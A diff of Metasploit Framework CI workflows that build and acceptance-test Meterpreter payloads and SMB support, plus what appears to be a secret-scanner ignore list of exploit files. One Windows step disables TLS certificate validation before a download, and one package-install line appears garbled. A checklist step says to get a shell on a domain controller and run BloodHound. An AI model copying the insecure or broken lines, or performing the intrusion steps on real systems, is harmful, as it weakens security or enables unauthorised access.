+        if: runner.os == 'Windows'
+        run: |
+          REM pcap dependencies
+          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
+
+          choco install 7zip.installServerCertificateValidationCallback
+          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
+
+          dir C:\\
+
+          dir %WINDIR%
+          type %WINDIR%\\system32\\drivers\\etc\\hosts
+
+      # The job checkout structure is:
+      #  .
+      #  ├── metasploit-framework
+      #  └── metasploit-payloads (Only if the "payload-testing-branch" GitHub label is applied)
+      #  └── mettle (Only if the "payload-testing-mettle-branch" GitHub label is applied)
+      - name: Checkout mettle
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/mettle
+          path: mettle
+          ref: ${{ inputs.mettle_commit }}
+
+      - name: Get mettle version
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        run: echo "METTLE_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" lib/metasploit_payloads/mettle/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: mettle
+
+      - name: Prerequisite mettle gem setup
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        run: |
+          set -x
+          ruby -pi.bak -e "gsub(/${{ env.METTLE_VERSION }}/, '${{ env.METTLE_VERSION }}-dev')" lib/metasploit_payloads/mettle/version.rb
+        working-directory: mettle
+
+      - name: Compile mettle payloads
+        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os != 'macos' && inputs.build_mettle }}
+        run: |
+          docker run --rm=true --tty --volume=$(pwd):/mettle --workdir=/mettle rapid7/build:mettle rake mettle:build mettle:check
+          rake build
+        working-directory: mettle
+
+      - name: Compile mettle payloads - macOS
+        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os == 'macos' && inputs.build_mettle }}
+        run: |
+          make TARGET=x86_64-apple-darwin
+          rake build
+        working-directory: mettle
+
+      - name: Checkout metasploit-framework commit
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-framework
+          path: metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
+      - name: Setup Ruby
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+          # Required for macos13 pg gem compilation
+          PKG_CONFIG_PATH: "/usr/local/opt/libpq/lib/pkgconfig"
+        # Pinned to avoid Windows compilation failure with nokogiri
+        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+          cache-version: 5
+          working-directory: metasploit-framework
+
+      - name: Move mettle gem into framework
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        run: |
+          cp ../mettle/pkg/metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem .
+        working-directory: metasploit-framework
+
+      - uses: actions/download-artifact@v4
+        name: Download Meterpreter
+        id: download_meterpreter
+        if: ${{ matrix.meterpreter.name != 'mettle' && inputs.build_metasploit_payloads }}
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: Extract Meterpreter (Unix)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
+        shell: bash
+        run: |
+          set -x
+          download_path=${{steps.download_meterpreter.outputs.download-path}}
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework
+
+      - name: Extract Meterpreter (Windows)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
+        shell: bash
+        run: |
+          set -x
+          download_path=$(cygpath -u '${{steps.download_meterpreter.outputs.download-path}}')
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework
+
+      - name: Install mettle gem
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        run: |
+          set -x
+          bundle exec gem install metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem
+          ruby -pi.bak -e "gsub(/'metasploit_payloads-mettle', '.*'/, '\'metasploit_payloads-mettle\', \'${{ env.METTLE_VERSION }}.pre.dev\'')" metasploit-framework.gemspec
+          bundle config unset deployment
+          bundle update metasploit_payloads-mettle
+          bundle install
+        working-directory: metasploit-framework
+
+      - name: Checkout metasploit-payloads
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-payloads
+          path: metasploit-payloads
+          ref: ${{ inputs.metasploit_payloads_commit }}
+
+      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
+        shell: cmd
+        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2019' && inputs.build_metasploit_payloads }}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
+        working-directory: metasploit-payloads
+
+      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
+        shell: cmd
+        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          make.bat
+        working-directory: metasploit-payloads
+
+      - name: Build Windows payloads via Visual Studio 2025 Build (Windows)
+        shell: cmd
+        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2025' && inputs.build_metasploit_payloads }}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          make.bat
+        working-directory: metasploit-payloads
+
+      - name: Get metasploit-payloads version
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        shell: bash
+        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: metasploit-payloads
+
+      - name: Install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' }}
+        run: |
+          ruby -pi -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec (Windows)
+        if: ${{ inputs.build_metasploit_payloads && (runner.os == 'Windows' && matrix.meterpreter.name != 'windows_meterpreter') && matrix.meterpreter.name != 'mettle' }}
+        shell: cmd
+        run: |
+          ruby -pi.bak -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Bundle update/install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle config unset deployment
+          bundle update metasploit-payloads
+          bundle install
+        working-directory: metasploit-framework
+
+      - name: Acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/meterpreter_spec.rb
+        working-directory: metasploit-framework
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
+          path: metasploit-framework/tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs: [test]
+    runs-on: ubuntu-latest
+    if: always() && needs.test.result != 'skipped'
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+        with:
+          repository: rapid7/metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
+        with:
+          ruby-version: '3.3'
+          bundler-cache: true
+          cache-version: 5
+
+      - uses: actions/download-artifact@v4
+        id: raw_report_data
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.raw_report_data.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.raw_report_data.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.raw_report_data.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.raw_report_data.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -0,0 +1,195 @@
+name: Shared SMB Acceptance
+on:
+  workflow_call:
+    inputs:
+      # Defaults set as '' will use the current branch as their commit
+      metasploit_framework_commit:
+        description: "metasploit-framework commit to build with"
+        default: ''
+        required: false
+        type: string
+      build_smb:
+        description: "Whether or not to build ruby_smb"
+        default: false
+        required: false
+        type: boolean
+
+jobs:
+  smb:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 60
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+      SMB_USERNAME: acceptance_tests_user
+      SMB_PASSWORD: acceptance_tests_password
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: SMB Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      # The job checkout structure is:
+      #  .
+      #  ├── metasploit-framework
+      #  └── ruby_smb
+      - name: Checkout ruby_smb
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/ruby_smb
+          path: ruby_smb
+
+      - name: Get ruby_smb version
+        if: ${{ inputs.build_smb }}
+        run: |
+          echo "RUBY_SMB_VERSION=$(grep -oh '[0-9].[0-9].[0-9]*' lib/ruby_smb/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: ruby_smb
+
+      - name: Build ruby_smb gem
+        if: ${{ inputs.build_smb }}
+        run: |
+          gem build ruby_smb.gemspec
+        working-directory: ruby_smb
+
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout metasploit-framework code
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-framework
+          path: metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      - name: Run docker container
+        working-directory: 'metasploit-framework'
+        run: |
+          cd test/smb
+          docker compose build
+          docker compose up --wait -d
+
+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          working-directory: 'metasploit-framework'
+
+      - name: Copy ruby_smb gem into metasploit-framework
+        if: ${{ inputs.build_smb }}
+        run: |
+          cp ../ruby_smb/ruby_smb-${{ env.RUBY_SMB_VERSION }}.gem .
+        working-directory: metasploit-framework
+
+      - name: Install ruby_smb gem
+        if: ${{ inputs.build_smb }}
+        run: |
+          bundle exec gem install ruby_smb-${{ env.RUBY_SMB_VERSION }}.gem
+          bundle config unset deployment
+          bundle update ruby_smb
+          bundle install
+        working-directory: metasploit-framework
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: 'latest'
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/smb_spec.rb
+        working-directory: metasploit-framework
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: smb_acceptance-${{ matrix.os }}
+          path: metasploit-framework/tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - smb
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-framework
+          path: metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          working-directory: metasploit-framework
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+        working-directory: metasploit-framework
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -42,122 +42,5 @@ on:
 #    - cron: '*/15 * * * *'

 jobs:
-  smb:
-    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - '3.2'
-        os:
-          - ubuntu-latest
-
-    env:
-      RAILS_ENV: test
-      SMB_USERNAME: acceptance_tests_user
-      SMB_PASSWORD: acceptance_tests_password
-      BUNDLE_WITHOUT: "coverage development pcap"
-
-    name: SMB Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
-    steps:
-      - name: Install system dependencies
-        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
-
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      - name: Run docker container
-        working-directory: 'test/smb'
-        run: |
-          docker compose build
-          docker compose up --wait -d
-
-      - name: Setup Ruby
-        env:
-          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
-          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-
-      - name: acceptance
-        env:
-          SPEC_HELPER_LOAD_METASPLOIT: false
-          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
-          RUNTIME_VERSION: 'latest'
-        # Unix run command:
-        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
-        # Windows cmd command:
-        #   set SPEC_HELPER_LOAD_METASPLOIT=false
-        #   bundle exec rspec .\spec\acceptance
-        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
-        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
-        run: |
-          bundle exec rspec spec/acceptance/smb_spec.rb
-
-      - name: Archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: smb_acceptance-${{ matrix.os }}
-          path: tmp/allure-raw-data
-
-  # Generate a final report from the previous test results
-  report:
-    name: Generate report
-    needs:
-      - smb
-    runs-on: ubuntu-latest
-    if: always()
-
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        if: always()
-
-      - name: Install system dependencies (Linux)
-        if: always()
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      - name: Setup Ruby
-        if: always()
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-          cache-version: 4
-
-      - uses: actions/download-artifact@v4
-        id: download
-        if: always()
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: allure generate
-        if: always()
-        run: |
-          export VERSION=2.22.1
-
-          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
-          tar -zxvf allure-$VERSION.tgz -C .
-
-          ls -la ${{steps.download.outputs.download-path}}
-          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
-
-          find ${{steps.download.outputs.download-path}}
-          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
-
-      - name: archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: final-report-${{ github.run_id }}
-          path: |
-            ./allure-report
+  build:
+    uses: ./.github/workflows/shared_smb_acceptance.yml
@@ -29,7 +29,7 @@ on:
 jobs:
  build:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60
    name: Docker Build
    steps:
      - name: Checkout code
@@ -41,7 +41,7 @@ jobs:

  test:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      postgres:
@@ -51,7 +51,7 @@ jobs:
          POSTGRES_USER: postgres
          POSTGRES_PASSWORD: postgres
        options: >-
-          --health-cmd pg_isready
+          --health-cmd "pg_isready --username postgres"
          --health-interval 10s
          --health-timeout 5s
          --health-retries 5
@@ -60,18 +60,14 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
          - '3.2'
          - '3.3'
-          - '3.4.0-preview1'
+          - '3.4'
        os:
-          - ubuntu-20.04
          - ubuntu-latest
-        exclude:
-          - { os: ubuntu-latest, ruby: '3.0' }
        include:
          - os: ubuntu-latest
-            ruby: '3.1'
+            ruby: '3.2'
            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
@@ -92,6 +88,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -0,0 +1,98 @@
+name: Weekly Data and External Tool Updater
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: write
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: write
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  schedule:
+    # Run once a week (e.g., every Monday at 01:00 UTC)
+    - cron: '0 1 * * 1'
+  workflow_dispatch: # Allows manual triggering from the Actions tab
+
+jobs:
+  update-data-files:
+    runs-on: ubuntu-latest
+
+    if: github.repository_owner == 'rapid7'
+
+    env:
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+
+      - uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Run Ruby updater scripts
+        run: |
+          ruby tools/dev/update_wordpress_vulnerabilities.rb
+          ruby tools/dev/update_joomla_components.rb
+          ruby tools/dev/update_user_agent_strings.rb
+          ruby tools/dev/check_external_scripts.rb -u
+      - name: Remove vendor folder # prevent git from adding it
+        run: rm -rf vendor
+
+      - name: Create Pull Request
+        uses: peter-evans/create-pull-request@v7
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+          commit-message: Update report
+          base: master
+          branch: weekly-updates
+          committer: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          author: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          title: "Weekly Data Update"
+          draft: false
+          body: |
+            This pull request was created automatically by a GitHub Action to update data files and external scripts.
+            The following tools were run:
+            - ruby tools/dev/update_wordpress_vulnerabilities.rb
+            - ruby tools/dev/update_joomla_components.rb
+            - ruby tools/dev/update_user_agent_strings.rb
+            - ruby tools/dev/check_external_scripts.rb -u
+            ## Verification
+            ### Wordpress/Joomla Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] Start `msfconsole`
+            - [ ] `use modules/auxiliary/scanner/http/wordpress_scanner`
+            - [ ] **Verify** it runs
+            ### JTR Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] See https://docs.metasploit.com/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes for hashes and cracking
+            ### SharpHound
+            - [ ] Start `msfconsole`
+            - [ ] get a shell on a DC or box connected to a dc
+            - [ ] `use post/windows/gather/bloodhound`
+            - [ ] `set session`
+            - [ ] `run`
+            - [ ] **Verify** it runs w/o erroring
+            - [ ] `set method disk`
+            - [ ] **Verify** it runs w/o erroring
@@ -0,0 +1,46 @@
+06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:73
+06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:76
+06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:119
+deabf9b1d846e4ced5dca20be5e21e8732762889:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2023_22527.md:16
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_proxy:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_proxy:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_collector:1
+58f9a39f72c623ab337a6768b34dc32f06d8ae67:documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md:60
+686d704b371da3545f21b281b4ee29f3863cd3b7:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:57
+686d704b371da3545f21b281b4ee29f3863cd3b7:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:57
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:65
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:93
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:7642
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:8471
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:8472
